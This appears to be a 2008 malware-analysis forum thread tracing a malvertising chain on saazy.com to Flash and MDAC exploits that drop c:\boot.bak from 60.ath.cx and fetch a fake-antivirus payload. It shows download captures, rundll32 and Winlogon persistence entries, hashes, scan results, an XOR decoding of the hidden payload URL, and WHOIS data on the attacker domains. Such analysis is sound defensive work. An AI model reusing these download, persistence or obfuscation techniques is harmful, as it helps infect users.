address: Xicheng District,Beijing,China
country: CN
phone: +86-10-66505588
fax-no: +86-10-66504252
e-mail: ip_address@cnuninet.com
nic-hdl: JY1446-AP
mnt-by: MAINT-CNNIC-AP
changed: ipas@cnnic.cn 20070828
source: APNIC

inetnum: 220.192.0.0 - 220.207.255.255
netname: UNICOM
descr: China United Telecommunications Corporation
descr: No.133,Taiyun Building,Xidan North Street
descr: Xicheng District,Beijing,China
country: CN
admin-c: JY7-CN
tech-c: JY7-CN
mnt-by: MAINT-CNNIC-AP
mnt-lower: MAINT-CN-UNICOM
status: ALLOCATED PORTABLE
changed: ipas@cnnic.cn 20071010
source: CNNIC

person: Jin Yang
nic-hdl: JY7-CN
e-mail: ip_address@cnuninet.com
address: No.133,Taiyun Building,Xidan North Street, Xicheng District,Beijing,China
phone: +86-10-66505588
fax-no: +86-10-66504252
country: CN
changed: ipas@cnnic.net.cn 20070927
mnt-by: MAINT-CNNIC-AP
source: CNNIC

220.196.0.0/17
AS9800 CHINAUNICOM BACKBONE No 133,Xi'dan North Street Beijing 100032

<h4></h4>
Found in a refer during a redirect to scanner.vavscan.com

CODE

GET /stats.php?site=[removed]&adv=[removed] HTTP/1.1
Accept: */*
Referer: http://scanner.vavscan.com/[removed]/[removed]
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: srv1.e-statistic.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/0.5.33
Date: Sat, 19 Jul 2008 16:28:08 GMT
Content-Type: image/gif
Transfer-Encoding: chunked
Connection: keep-alive

e-statistic.com - 207.226.175.78

Website Title: 403 Forbidden
Registry Data
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2007-12-05
Expires: 2008-12-05
Updated: 2008-02-07
Name Server: NS1.E-STATISTIC.COM (has 1 domains)
Name Server: NS2.E-STATISTIC.COM
Whois Server: whois.publicdomainregistry.com

Server Type: nginx/0.5.33
IP Address: 207.226.175.78
IP Location - Virginia - Mc Lean - Beyond The Network America Inc
Response Code: 403
Dedicated Hosting: e-statistic.com is hosted on a dedicated server.

Whois Record
Registration Service Provided By: VIVIDS MEDIA GMBH
Contact: +49.3094413291

Domain Name: E-STATISTIC.COM

Registrant:
PrivacyProtect.org
Domain Admin ()
P.O. Box 97
Note - All Postal Mails Rejected, visit Privacyprotect.org
Moergestel
null,5066 ZH
NL
Tel. +45.36946676

<h4></h4>
Today I did spend some time reading network captures related to my recent rotator.adjuggler.com case and I discovered 2 new swf files served through advertising.

Network traces.

We notice an advertisment on the main page of www.saazy.com

CODE

<div class="ad_300x250">
<!-- BEGIN 300X250 -->
<iframe width="300" height="250" noresize scrolling=No frameborder=0 marginheight=0 marginwidth=0 src="http://rotator.adjuggler.com/servlet/ajrotator/334223/0/vh?z=terp517&dim=300757&pos=2">
<script language=JavaScript src="http://rotator.adjuggler.com/servlet/ajrotator/334223/0/vj?z=terp517&dim=300757&pos=2&abr=$scriptiniframe"></script>
<noscript><a href="http://rotator.adjuggler.com/servlet/ajrotator/334223/0/cc?z=terp517&pos=2">
<img src="http://rotator.adjuggler.com/servlet/ajrotator/334223/0/vc?z=terp517&dim=300757&pos=2&abr=$imginiframe" width="300" height="250" border="0">
</a></noscript></iframe>
<!-- END 300X250 -->
</div>

Let's follow the consecutive redirects ...

CODE

GET http://rotator.adjuggler.com/servlet/ajrotator/334223/0/vh?z=terp517&dim=300757&pos=2 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://www.saazy.com/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: rotator.adjuggler.com
Proxy-Connection: Keep-Alive

CODE

GET http://count4.exitexchange.com/exit/1222876 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://rotator.adjuggler.com/servlet/ajrotator/334223/0/vh?z=terp517&dim=300757&pos=2
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: count4.exitexchange.com
Proxy-Connection: Keep-Alive

CODE

GET http://count4.exitexchange.com/exit/1159049?3387160 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://count4.exitexchange.com/exit/1222876
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: count4.exitexchange.com
Proxy-Connection: Keep-Alive

CODE

GET http://30.ath.cx/viewpost.php?pid=25 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://count4.exitexchange.com/exit/1159049?3387160
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Proxy-Connection: Keep-Alive
Host: 30.ath.cx

At 30.ath.cx we stumble on some obfuscated code. Besides the usual Internet Explorer MDAC and the Microsoft XML Core Services exploits, we notice a part dedicated to Flash. Installed Flash version is tested and according to results either i47.swf or i115.swf will be used.

______________________________

What does i47.swf or i115.swf do ?

Upon "execution / analyse" they try to access Internet as seen below in order to download a file from 60.ath.cx which will be saved as c:\boot.bak

CODE

GET /up.php HTTP/1.1
Accept: */*
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 60.ath.cx
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Sat, 26 Jul 2008 17:11:08 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Cache-Control: private
Content-Transfer-Encoding: binary
Accept-Ranges: bytes
Content-Length: 33280
Content-Disposition: inline; filename=set.css
Connection: close

Content-Type: application/octet-stream

Once saved, the file will be executed by rundll32.exe because boot.bak is a Dll

rundll32 c:\boot.bak,DllCanUnloadNow

boot.bak reveals some interesting stuff as seen in the packet stream. We can see some loading points and additional files to download.

______________________________

Visible loading points using HijackThis.

O4 - HKLM\..\Run: [System Restore Routine] rundll32 c:\boot.bak,DllCanUnloadNow
O4 - HKCU\..\Run: [System Restore Routine] rundll32 c:\boot.bak,DllCanUnloadNow
O4 - HKUS\S-1-5-18\..\Run: [System Restore Routine] rundll32 c:\boot.bak,DllCanUnloadNow (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [System Restore Routine] rundll32 c:\boot.bak,DllCanUnloadNow (User 'Default user')
O20 - Winlogon Notify: SysBackup - c:/boot.bak

______________________________

c:\boot.bak

Once loaded by rundll32.exe, list.php will be requested from the server. This file will be saved as C:\Documents and Settings\[username]\Cookies\site.yahoo.txt
It does contain a chain of hex characters which I deliberately left out of the stream. I suspect this *might* represent an URL ... but I'm unable to confirm this right now.

CODE

GET /list.php HTTP/1.1
Accept: */*
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 60.ath.cx
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Sat, 26 Jul 2008 17:12:03 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 61
Connection: close

Content-Type: text/html

The next step is to request 554.exe from 60.ath.cx which will be saved as C:\Documents and Settings\[username]\Cookies\0.exe

CODE

GET /files/554.exe HTTP/1.1
Accept: */*
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 60.ath.cx
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Sat, 26 Jul 2008 17:12:12 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.6
Last-Modified: Sat, 26 Jul 2008 14:40:29 GMT
ETag: "13a4459-1ae00-452ee4586d140"
Accept-Ranges: bytes
Content-Length: 110080
Connection: close

Content-Type: application/x-msdownload

0.exe will be executed by c:\boot.bak

______________________________

After reboot.

Once the computer rebooted, c:\boot.bak is loaded under the winlogon process and it will then launch 0.exe present on our HDD.

Files will be updated as "rundll32.exe" downloads list.php followed by the executable from internet again.
If I'm not mistaken, this method *could* allow to load whatever executable on boot without changing anything to the registry once boot.bak in place. Putting the files into the cookies folder is a nifty trick too as they will be considered as "harmless" by the average user.
______________________________

SWF Files.

When it comes to action script code i47.swf and i115.swf are identical. The addFrameScript() method is used to dynamically add a frame script.

i47.swf has 4 tags while i115.swf only has 3 tags.

The files are very difficult to analyse but the shellcode *might* again be hidden in the image as seen in the Kaspersky write-up.

<h4></h4>
Filename: ie_update.exe

This is the file from the Internet Explorer MDAC / Microsoft XML Core Services exploit. It performs the same actions as the Flash Files.

File size: 1024 bytes
MD5...: 4e6a301eb75586afdb4f2465aaf90fcb
SHA1..: 3f72fc5c1650b7ede99df39b9ac915f2197b0229
PEiD..: -

QUOTE

File ie_update.exe received on 07.26.2008 16:47:35 (CET)
AhnLab-V3 2008.7.26.0 2008.07.25 -
AntiVir 7.8.1.12 2008.07.25 -
Authentium 5.1.0.4 2008.07.26 -
Avast 4.8.1195.0 2008.07.25 -
AVG 8.0.0.130 2008.07.25 -
BitDefender 7.2 2008.07.26 Win32.KME.Based.1.Gen
CAT-QuickHeal 9.50 2008.07.25 -
ClamAV 0.93.1 2008.07.26 -
DrWeb 4.44.0.09170 2008.07.26 -
eSafe 7.0.17.0 2008.07.24 -
eTrust-Vet 31.6.5983 2008.07.26 -
Ewido 4.0 2008.07.26 -
F-Prot 4.4.4.56 2008.07.25 -
F-Secure 7.60.13501.0 2008.07.26 W32/Downloader
Fortinet 3.14.0.0 2008.07.26 -
GData 2.0.7306.1023 2008.07.26 -
Ikarus T3.1.1.34.0 2008.07.26 -
Kaspersky 7.0.0.125 2008.07.26 -
McAfee 5347 2008.07.25 -
Microsoft 1.3704 2008.07.26 -
NOD32v2 3300 2008.07.25 -
Norman 5.80.02 2008.07.25 W32/Downloader
Panda 9.0.0.4 2008.07.26 -
PCTools 4.4.2.0 2008.07.26 -
Prevx1 V2 2008.07.26 -
Rising 20.54.52.00 2008.07.26 -
Sophos 4.31.0 2008.07.26 -
Sunbelt 3.1.1536.1 2008.07.25 -
Symantec 10 2008.07.26 -
TheHacker 6.2.96.389 2008.07.25 -
TrendMicro 8.700.0.1004 2008.07.26 -
VBA32 3.12.8.1 2008.07.26 suspected of Win32.Trojan.Downloader (http://...)
ViRobot 2008.7.26.1311 2008.07.26 -
VirusBuster 4.5.11.0 2008.07.26 -
Webwasher-Gateway 6.6.2 2008.07.26 -

______________________________

Filename: i47.swf

File size: 728 bytes
MD5...: 8c802fa1e22eb006def9b1df88f951c5
SHA1..: 751388f93da81188753e88050a36b9dd2066152d
SHA256: ea7e7f288f9d0125c5cb911ba4ea8d8a45fbe442fc864b71ad5568f9bc7c9481
PEiD..: -
packers (Kaspersky): Swf2Swc

QUOTE

File i47.swf received on 07.26.2008 20:14:35 (CET)
AhnLab-V3 2008.7.26.0 2008.07.25 Win-Trojan/Exploit-SWF.Gen
AntiVir 7.8.1.12 2008.07.25 EXP/Flash.Gen
Authentium 5.1.0.4 2008.07.26 -
Avast 4.8.1195.0 2008.07.26 SWF:CVE-2007-0071
AVG 8.0.0.130 2008.07.25 -
BitDefender 7.2 2008.07.26 Exploit.SWF.Gen
CAT-QuickHeal 9.50 2008.07.25 SWF.Exploit
ClamAV 0.93.1 2008.07.26 -
DrWeb 4.44.0.09170 2008.07.26 -
eSafe 7.0.17.0 2008.07.24 -
eTrust-Vet 31.6.5983 2008.07.26 -
Ewido 4.0 2008.07.26 -
F-Prot 4.4.4.56 2008.07.26 -
F-Secure 7.60.13501.0 2008.07.26 -
Fortinet 3.14.0.0 2008.07.26 -
GData 2.0.7306.1023 2008.07.26 SWF:CVE-2007-0071
Ikarus T3.1.1.34.0 2008.07.26 -
Kaspersky 7.0.0.125 2008.07.26 -
McAfee 5347 2008.07.25 -
Microsoft 1.3704 2008.07.26 Exploit:Win32/APSB08-11.gen!A
NOD32v2 3300 2008.07.25 -
Norman 5.80.02 2008.07.25 -
Panda 9.0.0.4 2008.07.26 -
PCTools 4.4.2.0 2008.07.26 -
Prevx1 V2 2008.07.26 -
Rising 20.54.52.00 2008.07.26 Hack.Exploit.Swf.a
Sophos 4.31.0 2008.07.26 Exp/SWFScene-A
Sunbelt 3.1.1536.1 2008.07.25 -
Symantec 10 2008.07.26 -
TheHacker 6.2.96.389 2008.07.25 -
TrendMicro 8.700.0.1004 2008.07.26 -
VBA32 3.12.8.1 2008.07.26 -
ViRobot 2008.7.26.1311 2008.07.26 -
VirusBuster 4.5.11.0 2008.07.26 -
Webwasher-Gateway 6.6.2 2008.07.26 Exploit.Flash.Gen

______________________________

Filename: i115.swf

File size: 754 bytes
MD5...: c7c21d95ffb6aaa3cc18a546803786fc
SHA1..: 5105810716e3d1816e02c81ca9310df01298b6c4
SHA256: 798225306d0c9c504c74c7ed57315220b97bd78bccab84890503d495c52763b7
PEiD..: -
packers (Kaspersky): Swf2Swc

QUOTE

File i115.swf received on 07.26.2008 20:14:53 (CET)
AhnLab-V3 2008.7.26.0 2008.07.25 Win-Trojan/Exploit-SWF.Gen
AntiVir 7.8.1.12 2008.07.25 EXP/Flash.Gen
Authentium 5.1.0.4 2008.07.26 -
Avast 4.8.1195.0 2008.07.26 SWF:CVE-2007-0071
AVG 8.0.0.130 2008.07.25 -
BitDefender 7.2 2008.07.26 Exploit.SWF.Gen
CAT-QuickHeal 9.50 2008.07.25 SWF.Exploit
ClamAV 0.93.1 2008.07.26 -
DrWeb 4.44.0.09170 2008.07.26 -
eSafe 7.0.17.0 2008.07.24 -
eTrust-Vet 31.6.5983 2008.07.26 -
Ewido 4.0 2008.07.26 -
F-Prot 4.4.4.56 2008.07.26 -
F-Secure 7.60.13501.0 2008.07.26 -
Fortinet 3.14.0.0 2008.07.26 -
GData 2.0.7306.1023 2008.07.26 SWF:CVE-2007-0071
Ikarus T3.1.1.34.0 2008.07.26 -
Kaspersky 7.0.0.125 2008.07.26 -
McAfee 5347 2008.07.25 -
Microsoft 1.3704 2008.07.26 Exploit:Win32/APSB08-11.gen!A
NOD32v2 3300 2008.07.25 SWF/Exploit.CVE-2007-0071
Norman 5.80.02 2008.07.25 -
Panda 9.0.0.4 2008.07.26 -
PCTools 4.4.2.0 2008.07.26 -
Prevx1 V2 2008.07.26 -
Rising 20.54.52.00 2008.07.26 -
Sophos 4.31.0 2008.07.26 Exp/SWFScene-A
Sunbelt 3.1.1536.1 2008.07.25 -
Symantec 10 2008.07.26 Bloodhound.Exploit.193
TheHacker 6.2.96.389 2008.07.25 -
TrendMicro 8.700.0.1004 2008.07.26 -
VBA32 3.12.8.1 2008.07.26 -
ViRobot 2008.7.26.1311 2008.07.26 -
VirusBuster 4.5.11.0 2008.07.26 -
Webwasher-Gateway 6.6.2 2008.07.26 Exploit.Flash.Gen

______________________________

Filename: boot.bak

File size: 110080 bytes
MD5...: b826aecb029962edbd771d149a920b21
SHA1..: a5ac9997a59ec1d227c0d708f9aacd8b5d33ffb4
SHA256: bf026894ea43cbcad39f554476dc1847cdec0cdb76e9161a1095c56a0a8c689f
PEiD..: -

QUOTE

File boot.bak received on 07.27.2008 00:59:17
AhnLab-V3 2008.7.26.0 2008.07.25 -
AntiVir 7.8.1.12 2008.07.26 -
Authentium 5.1.0.4 2008.07.26 -
Avast 4.8.1195.0 2008.07.26 -
AVG 8.0.0.130 2008.07.26 -
BitDefender 7.2 2008.07.26 -
CAT-QuickHeal 9.50 2008.07.25 -
ClamAV 0.93.1 2008.07.27 -
DrWeb 4.44.0.09170 2008.07.26 -
eSafe 7.0.17.0 2008.07.24 -
eTrust-Vet 31.6.5983 2008.07.26 -
Ewido 4.0 2008.07.26 -
F-Prot 4.4.4.56 2008.07.26 -
F-Secure 7.60.13501.0 2008.07.26 -
Fortinet 3.14.0.0 2008.07.26 -
GData 2.0.7306.1023 2008.07.27 -
Ikarus T3.1.1.34.0 2008.07.26 -
Kaspersky 7.0.0.125 2008.07.26 -
McAfee 5347 2008.07.25 -
Microsoft 1.3704 2008.07.27 -
NOD32v2 3300 2008.07.25 -
Norman 5.80.02 2008.07.25 -
Panda 9.0.0.4 2008.07.26 -
PCTools 4.4.2.0 2008.07.26 -
Prevx1 V2 2008.07.27 -
Rising 20.54.52.00 2008.07.26 -
Sophos 4.31.0 2008.07.26 -
Sunbelt 3.1.1536.1 2008.07.25 -
Symantec 10 2008.07.26 -
TheHacker 6.2.96.389 2008.07.25 -
TrendMicro 8.700.0.1004 2008.07.26 -
VBA32 3.12.8.1 2008.07.26 -
ViRobot 2008.7.26.1311 2008.07.26 -
VirusBuster 4.5.11.0 2008.07.26 -
Webwasher-Gateway 6.6.2 2008.07.26 -

______________________________

Filename: 0.exe

File size: 33280 bytes
MD5...: 47d6acb7d79d7790da02b9fbd809eacb
SHA1..: 638f76a93cb6fc35c9a33e4a8b6d2971fd381411
SHA256: 7945086ac43c55423c44de4328ac41cef0e0143d597c98873d0f1f3941212ba6
PEiD..: -

QUOTE

File 0.exe received on 07.26.2008 20:15:47 (CET)
AhnLab-V3 2008.7.26.0 2008.07.25 -
AntiVir 7.8.1.12 2008.07.25 HEUR/Crypted
Authentium 5.1.0.4 2008.07.26 -
Avast 4.8.1195.0 2008.07.26 -
AVG 8.0.0.130 2008.07.25 Downloader.FraudLoad.A
BitDefender 7.2 2008.07.26 -
CAT-QuickHeal 9.50 2008.07.25 (Suspicious) - DNAScan
ClamAV 0.93.1 2008.07.26 -
DrWeb 4.44.0.09170 2008.07.26 -
eSafe 7.0.17.0 2008.07.24 Suspicious File
eTrust-Vet 31.6.5983 2008.07.26 -
Ewido 4.0 2008.07.26 -
F-Prot 4.4.4.56 2008.07.26 -
F-Secure 7.60.13501.0 2008.07.26 -
Fortinet 3.14.0.0 2008.07.26 -
GData 2.0.7306.1023 2008.07.26 -
Ikarus T3.1.1.34.0 2008.07.26 -
Kaspersky 7.0.0.125 2008.07.26 -
McAfee 5347 2008.07.25 -
Microsoft 1.3704 2008.07.26 Worm:Win32/Nuwar.KE
NOD32v2 3300 2008.07.25 -
Norman 5.80.02 2008.07.25 -
Panda 9.0.0.4 2008.07.26 -
PCTools 4.4.2.0 2008.07.26 -
Prevx1 V2 2008.07.26 Malicious Software
Rising 20.54.52.00 2008.07.26 -
Sophos 4.31.0 2008.07.26 -
Sunbelt 3.1.1536.1 2008.07.25 -
Symantec 10 2008.07.26 Packed.Generic.174
TheHacker 6.2.96.389 2008.07.25 -
TrendMicro 8.700.0.1004 2008.07.26 -
VBA32 3.12.8.1 2008.07.26 -
ViRobot 2008.7.26.1311 2008.07.26 -
VirusBuster 4.5.11.0 2008.07.26 -
Webwasher-Gateway 6.6.2 2008.07.26 Heuristic.Crypted

<h4></h4>
Update on site.yahoo.txt

Thanks to MAD I may now confirm it does contain the URL of the file to download. Such a technique could make you download a different file tomorrow, run it on your computer without having to modify anything related to startup settings since the file is loaded by boot.bak.

Inside the stream capture of boot.bak ( cf http://www.bluetack.co.uk/Kimberly/Logs/swf232.jpg ) we notice a string called "sobaka-barabaka". Further analysis of boot.bak reveals the following portion of code :

CODE

10002C98   push    offset "sobaka-barabaka"
10002C9D   lea    eax, [ebp+var_3FC]
10002CA3   push    eax
10002CA4   call    dec0de

Note: the above is only a small snipit and it does not represent the complete decoding procedure (UrlDecoded).

We can call sobaka-barabaka a "key" to decode the string inside list.php aka site.yahoo.txt. The following reference table will come in handy for people who are not familiar with conversions.

CODE

s -> 115 -> 0x73 -> 163 -> 1110011
o -> 111 -> 0x6F -> 157 -> 1101111
b -> 98 -> 0x62 -> 142 -> 1100010
a -> 97 -> 0x61 -> 141 -> 1100001
k -> 107 -> 0x6B -> 153 -> 1101011
a -> 97 -> 0x61 -> 141 -> 1100001
...
...

Got the principe of conversion? Let's move on to decoding then. Our string is

21B1B1611514E0254515C00160945020B40040807045E4D5447554C041304

We leave aside the 2 in front of the chain and keep the rest.

1B1B1611514E0254515C00160945020B40040807045E4D5447554C041304

Being a hex representation the chain will be decoded per 2 using the "key".

key: s -> 115 -> 0x73 -> 163 -> 1110011
part: 1B
decode: 0x73^0x1B=0x68

0x68 in Hex represents 104 in ascii which represents the letter h

To decode the string, a loop is needed until all hex chars are processed. Below is the illustration / result of the decoding procedure.

CODE

0x73^0x1B:0x68 -> h
0x6F^0x1B:0x74 -> t
0x62^0x16:0x74 -> t
0x61^0x11:0x70 -> p
0x6B^0x51:0x3A -> :
0x61^0x4E:0x2F -> /
0x2D^0x02:0x2F -> /
0x62^0x54:0x36 -> 6
0x61^0x51:0x30 -> 0
0x72^0x5C:0x2E -> .
0x61^0x00:0x61 -> a
0x62^0x16:0x74 -> t
0x61^0x09:0x68 -> h
0x6B^0x45:0x2E -> .
0x61^0x02:0x63 -> c
0x73^0x0B:0x78 -> x
0x6F^0x40:0x2F -> /
0x62^0x04:0x66 -> f
0x61^0x08:0x69 -> i
0x6B^0x07:0x6C -> l
0x61^0x04:0x65 -> e
0x2D^0x5E:0x2F -> s
0x62^0x4D:0x2F -> /
0x61^0x54:0x35 -> 5
0x72^0x47:0x35 -> 5
0x61^0x55:0x34 -> 4
0x62^0x4C:0x2E -> .
0x61^0x04:0x65 -> e
0x6B^0x13:0x78 -> x
0x61^0x04:0x65 -> e

Which gives us http://60.ath.cx/files/554.exe
This file will be saved as C:\Documents and Settings\[username]\Cookies\0.exe

Special thanks fly out to MAD for confirming my initial thought of this being a link.

<h4></h4>
ie_update.exe - i47.swf - i115.swf perform all the same task, download 60.ath.cx/up.php, save the file as c:\boot.bak and run the file.

Since it's extremely difficult to work with the SWF files, I did chose ie_update.exe instead in order to show you the "embedded" link and actions taken.

Below we see the use of urlmon.URLDownloadToFileA. This function will be used to download our file and save it as c:\boot.bak.
In the hex dump, we already notice the URL

Let's follow the CALL EAX a bit closer. Screenshot below is "inside" urlmon.dll. We clearly see our two actors, 60.ath.cx/up.php and c:\boot.bak

Once our file downloaded, kernel32.WinExec is called. Once passed that call we get the prompt from ProcessGuard that ie_update.exe wants to start c:\boot.bak using rundll32.exe (boot.bak being a Dll)

The same actions are performed with i47.swf & i115.swf.

<h4></h4>
Today I had a closer look at 0.exe, the file downloaded by c:\boot.bak. 0.exe contains a couple of interesting domains coded into it.

• www.winifixer.com
• avxp-08.com
• youpornztube.com

winifixer.com

Website Title: WiniFixer
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-01-29
Expires: 2009-01-29
Updated: 2008-07-27
Whois Server: whois.estdomains.com

Server Type: Apache
IP Address: 216.195.41.11
IP Location - China - Clivland Brian

Whois Record
Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: WINIFIXER.COM

Registrant:
OOO AJSBIRI
Mishakov Viktor Ivanovich ()
Tihvinskaya, 20
Moscow
Moskovskaya oblast,127055
RU
Tel. +1.2107673441

Creation Date: 29-Jan-2008
Expiration Date: 29-Jan-2009

Domain servers in listed order:
No NameServers Defined.

Administrative Contact:
OOO AJSBIRI
Mishakov Viktor Ivanovich ()
Tihvinskaya, 20
Moscow
Moskovskaya oblast,127055
RU
Tel. +1.2107673441

Technical Contact:
OOO AJSBIRI
Mishakov Viktor Ivanovich ()
Tihvinskaya, 20
Moscow
Moskovskaya oblast,127055
RU
Tel. +1.2107673441

Billing Contact:
OOO AJSBIRI
Mishakov Viktor Ivanovich ()
Tihvinskaya, 20
Moscow
Moskovskaya oblast,127055
RU
Tel. +1.2107673441

Websites.

1. Winifixer.com
2. Youpornztube.com

______________________________

youpornztube.com

Website Title: None given.
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-03-03
Expires: 2009-03-03
Updated: 2008-07-27
Name Server: NS1.YOUPORNZTUBE.COM (has 1 domains)
Name Server: NS2.YOUPORNZTUBE.COM
Name Server: NS4.YOUPORNZTUBE.COM
Name Server: NS5.YOUPORNZTUBE.COM
Whois Server: whois.estdomains.com

Server Type: Apache
IP Address: 216.195.41.11
IP Location - China - Clivland Brian

Whois Record
Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: YOUPORNZTUBE.COM

Registrant:
Confidential District Limited
Alex James ()
Suite 2, Portland House, Glacis Road
Suite 2
Not Applicable,gi
GI
Tel. +414.45866123

Creation Date: 03-Mar-2008
Expiration Date: 03-Mar-2009

Domain servers in listed order:
ns5.youpornztube.com
ns4.youpornztube.com
ns2.youpornztube.com
ns1.youpornztube.com

Administrative Contact:
Confidential District Limited
Alex James ()
Suite 2, Portland House, Glacis Road
Suite 2
Not Applicable,gi
GI
Tel. +414.45866123

Technical Contact:
Confidential District Limited
Alex James ()
Suite 2, Portland House, Glacis Road
Suite 2
Not Applicable,gi
GI
Tel. +414.45866123

Billing Contact:
Confidential District Limited
Alex James ()
Suite 2, Portland House, Glacis Road
Suite 2
Not Applicable,gi
GI
Tel. +414.45866123
______________________________

avxp-08.com

Website Title: Antivirus XP 2008
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-07-24
Expires: 2009-07-24
Updated: 2008-07-27
Name Server: NS1.AVXP-08.COM (has 1 domains)
Name Server: NS2.AVXP-08.COM
Name Server: NS4.AVXP-08.COM
Name Server: NS5.AVXP-08.COM
Whois Server: whois.estdomains.com

IP Address: 85.255.118.171
IP Location - Ukraine - Ukrtelegroup Ltd

Whois Record
Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: AVXP-08.COM

Registrant:
eccos inc
krab ()
ny 37str
krabvill
Adygeja - Respublika,1111
RU
Tel. +1.324234234

Creation Date: 24-Jul-2008
Expiration Date: 24-Jul-2009

Domain servers in listed order:
ns5.avxp-08.com
ns4.avxp-08.com
ns2.avxp-08.com
ns1.avxp-08.com

Administrative Contact:
eccos inc
krab ()
ny 37str
krabvill
Adygeja - Respublika,1111
RU
Tel. +1.324234234

Technical Contact:
eccos inc
krab ()
ny 37str
krabvill
Adygeja - Respublika,1111
RU
Tel. +1.324234234

Billing Contact:
eccos inc
krab ()
ny 37str
krabvill
Adygeja - Respublika,1111
RU
Tel. +1.324234234

Websites.

1. Avxp-08.com
2. I-kerberos.com
3. Tobesoftware.com

______________________________

No NS servers are given for winifixer.com. On robtex, just before the page refreshes, we see it had 85.255.117.163 as IP and shared that same IP with youpornztube.com, avxp-08.com, tobesoftware.com and malwareprotector2008.com

Concerning youpornztube.com ... from Robtex

youpornztube.com is a domain controlled by five nameservers at youpornztube.com themselves There are two duplicate ipnumbers. All of them are on the same IP network. Incoming mail for youpornztube.com is handled by one mailserver which are also at youpornztube.com. youpornztube.com has one IP record . ns2.avxp08.com, tobesoftware.com, ns2.tobesoftware.com and ns2.malwareprotector2008.com point to the same IP. avxp08.com, tobesoftware.com and malwareprotector2008.com use this as a nameserver. antivirxp08.com share nameservers with this domain. avxp08.com, avxp2008.com, antivirxp08.com, tobesoftware.com, bakasoftware.net and at least six other hosts share mailservers with this domain. ns4.youpornztube.com, ns3.youpornztube.com, ns6.youpornztube.com, www.youpornztube.com, ns2.youpornztube.com and at least five other hosts are subdomains to this hostname.

85.255.117.163 is listed as being the current IP of youpornztube.com.

A quick check shows that they are moving domains around though. Currently resolving as ...

78.159.96.16 - tobesoftware.com
78.159.96.16 - advancedxpfixer.com
78.159.96.16 - antivirxp08.com

78.159.96.17 - antivirusprofessional2008.com
78.159.96.17 - avxp08.com
78.159.96.17 - avxp2008.com
78.159.96.17 - avxp-08.com

85.255.114.170 - antivirusxp-2008.com

85.255.118.171 - malwareprotector2008.com
85.255.118.171 - i-kerberos.com

194.110.162.114 - 216.195.41.11 - 216.240.139.169 - antivirusxp2008.com

211.95.79.242 - antivirusxp08.com

216.255.189.155 - bakasoftware.net

<h4></h4>
gnida.swf, newbieadguide.com & co are they still used or dead? Only one way to figure out ... I was kinda surprised when I saw the link newbieadguide.com/swf/gnida.swf?campaign=mortmainon&u23423424 show up in search with a date / time stamp of 2008/07/17 00:54.

Let's narrow down a lil' bit.

Hmm ... some other links point their nose ... lil' peek on them also by isolating some stuff.

In our basket we now have

newbieadguide.com/swf/gnida.swf?campaign=mortmainon&u23423424
www.estandi.yoyo.pl/Aolmail.html
gogele.com
bull.s11.x-beat.com/src/bull124569.gif

and more recently newbieadguide.com replaced by

chocolatgirl.50webs.com/description/lame-enc.html

<h4></h4>
newbieadguide.com/swf/gnida.swf?campaign=mortmainon&u23423424

No live redirect right now, at least not for me. It's setting a cookie and not showing stats so the campaign might still be "in use".
______________________________

estandi.yoyo.pl/Aolmail.html

Interesting case I must say; as it took me 2 minutes to figure out how the hell I suddenly ended up at scanning-computer-online.com. I didn't even have the chance to see estandi.yoyo.pl/Aolmail.html loading ...

On estandi.yoyo.pl/Aolmail.html we find a reference to a.js

The content of a.js does reveal us the next location ... aqtravel.info/find/search.php?said=Mkey5&q=Aolmail

At aqtravel.info we stumble on a 302 error which does forward us to the fake online scanner.

CODE

GET /find/search.php?said=Mkey5&q=Aolmail HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
